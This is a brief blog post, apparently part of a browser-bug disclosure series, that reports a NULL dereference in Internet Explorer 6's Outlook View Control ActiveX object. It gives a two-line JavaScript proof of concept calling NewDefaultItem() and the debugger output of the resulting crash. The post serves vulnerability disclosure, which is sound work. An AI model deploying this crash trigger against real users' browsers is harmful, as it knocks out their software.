The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.
var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();
Demonstration
eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment